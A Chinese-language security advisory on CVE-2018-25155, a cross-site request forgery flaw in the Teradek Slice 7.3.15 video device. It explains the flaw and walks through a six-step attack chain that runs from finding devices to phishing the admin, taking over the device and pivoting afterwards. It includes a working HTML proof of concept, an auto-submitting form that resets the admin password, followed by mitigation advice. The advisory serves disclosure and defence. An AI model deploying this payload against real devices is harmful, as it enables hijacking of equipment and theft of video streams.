CVE-2018-25155 Teradek Slice 跨站请求伪造漏洞可导致管理员密码被篡改

漏洞信息

漏洞编号

CVE-2018-25155

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Teradek Slice 7.3.15

漏洞概述

CVE-2018-25155是Teradek Slice 7.3.15版本中存在的一个跨站请求伪造（CSRF）安全漏洞。Teradek Slice是一款专业的广播级视频传输设备，广泛应用于新闻直播、体育赛事转播、电影制作等专业视频领域。该漏洞允许未经身份验证的远程攻击者通过构造恶意网页，诱骗已登录的管理员用户在不知情的情况下执行密码修改操作，从而实现对设备管理权限的非法获取。攻击者利用Web应用对用户请求缺乏有效验证的缺陷，结合社会工程学攻击手段，可以在管理员访问恶意页面时自动触发密码更改请求。由于该设备通常用于关键的视频传输任务，一旦管理员密码被篡改，攻击者可以完全控制设备设置，包括网络配置、视频流参数等，严重威胁视频传输安全和企业网络安全。建议设备管理员及时关注官方安全更新，并在使用设备管理界面时保持警惕，避免访问可疑链接。

技术细节

该CSRF漏洞存在于Teradek Slice的管理员密码修改功能中。漏洞产生的根本原因在于设备Web管理界面在处理密码修改请求时缺少必要的CSRF令牌验证和请求来源校验机制。正常情况下，安全的Web应用会对每个状态变更请求（如密码修改）生成唯一的CSRF令牌，并在服务器端验证该令牌的合法性，同时检查HTTP请求的Referer或Origin头字段以确认请求来源。而Teradek Slice 7.3.15版本未实现这些防护措施。攻击者可以构造一个恶意HTML页面，其中包含自动提交的密码修改表单，表单中的目标URL指向设备的密码修改接口。攻击者通过钓鱼邮件、恶意链接或网页嵌入等方式诱使已登录的管理员访问该页面。当管理员浏览器加载页面后，JavaScript代码会自动提交表单，由于浏览器会自动携带目标域的Cookie，服务器会认为这是管理员的合法请求并执行密码修改操作。攻击者只需在表单中指定新密码，即可将管理员密码替换为攻击者控制的密码，从而获得设备管理权限。攻击成功后，攻击者可以进一步窃取视频流内容、修改传输配置或将设备纳入僵尸网络。

攻击链分析

STEP 1

步骤1: 侦察和信息收集

攻击者首先收集目标Teradek Slice设备的相关信息，包括IP地址、管理界面URL和默认端口等。攻击者可能通过 Shodan、Zoomeye 等物联网搜索引擎发现暴露在互联网上的设备，或者通过内网扫描定位目标。

STEP 2

步骤2: 构造恶意页面

攻击者根据CVE-2018-25155漏洞详情，构造一个包含自动提交表单的恶意HTML页面。表单的action指向目标设备的密码修改接口（如/cgi-bin/admin.cgi），并设置攻击者想要的新密码。页面中嵌入JavaScript代码实现页面加载时自动提交表单。

STEP 3

步骤3: 社会工程攻击

攻击者通过钓鱼邮件、即时通讯、社交媒体或恶意网站等渠道，将恶意页面链接发送给目标管理员。攻击者可能伪装成技术支持人员、设备更新通知或视频相关资讯，诱使管理员点击链接。攻击成功率高度依赖管理员的安全意识和警惕性。

STEP 4

步骤4: 诱导访问恶意页面

当管理员使用已登录的浏览器访问攻击者构造的恶意页面时，页面中的JavaScript代码会自动构建并提交密码修改HTTP请求。由于浏览器会自动携带目标域的Cookie和认证信息，服务器会认为这是管理员的合法操作。

STEP 5

步骤5: 密码篡改成功

目标服务器的Web应用因缺少CSRF令牌验证和请求来源检查，直接执行密码修改操作。管理员的原始密码被替换为攻击者指定的新密码。操作完成后，攻击者可以使用新密码登录设备管理界面，获得完全控制权。

STEP 6

步骤6: 持久化控制和后续攻击

攻击者成功登录后可以修改设备配置、窃取视频流内容、安装后门或进一步渗透内网。攻击者可能修改管理员联系方式以阻止密码恢复，或者将设备用于组建僵尸网络进行DDoS攻击等非法活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2018-25155 - Teradek Slice Password Change -->
<!-- This PoC demonstrates how an attacker can change the admin password via CSRF attack -->
<!DOCTYPE html>
<html>
<head>
    <title>Teradek Slice CSRF PoC - CVE-2018-25155</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .info { background: #e3f2fd; padding: 15px; border-radius: 5px; margin: 10px 0; }
        .hidden { display: none; }
    </style>
</head>
<body>
    <div class="info">
        <h2>CVE-2018-25155 PoC</h2>
        <p>This PoC demonstrates the CSRF vulnerability in Teradek Slice 7.3.15</p>
        <p>Target: Teradek Slice device with default or known admin session</p>
    </div>

    <!-- Hidden form that auto-submits password change request -->
    <form id="csrfForm" action="http://[TERADEK_IP]/cgi-bin/admin.cgi" method="POST" class="hidden">
        <!-- Authentication token (may not be validated server-side) -->
        <input type="hidden" name="token" value="any_value">
        <!-- Password change action -->
        <input type="hidden" name="action" value="password_change">
        <!-- New admin password set by attacker -->
        <input type="hidden" name="new_password" value="PwnedByAttacker123">
        <!-- Confirm new password -->
        <input type="hidden" name="confirm_password" value="PwnedByAttacker123">
        <!-- Admin username -->
        <input type="hidden" name="username" value="admin">
    </form>

    <script>
        // Auto-submit the form when page loads
        window.onload = function() {
            console.log('[CVE-2018-25155] CSRF PoC loaded, submitting form...');
            document.getElementById('csrfForm').submit();
        };
    </script>

    <div class="info">
        <p><strong>Note:</strong> For educational and security testing purposes only.</p>
        <p>Replace [TERADEK_IP] with the actual IP address of the target Teradek Slice device.</p>
    </div>
</body>
</html>

影响范围

Teradek Slice < 7.3.15 (受影响版本)

Teradek Slice 7.3.15 (确认受影响)

防御指南

临时缓解措施

在官方修复版本发布之前，建议采取以下临时缓解措施：1) 限制管理界面的网络访问，仅允许受信任的IP地址访问；2) 使用VPN或专线连接管理设备，避免通过公网访问；3) 定期检查管理员账户和密码设置，发现异常立即重置；4) 培训管理员识别钓鱼攻击，不点击来源不明的链接；5) 启用浏览器的隐私保护功能，限制第三方Cookie；6) 在防火墙上实施严格的出站和入站流量控制；7) 监控设备日志，关注异常的密码修改和登录尝试记录。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2018-25155
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2018-25155
3 Details https://www.cvedetails.com/cve/CVE-2018-25155/
4 VulDB https://vuldb.com/cve/CVE-2018-25155
5 Link https://www.exploit-db.com/exploits/44676
6 Link https://www.teradek.com
7 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php
8 Link https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php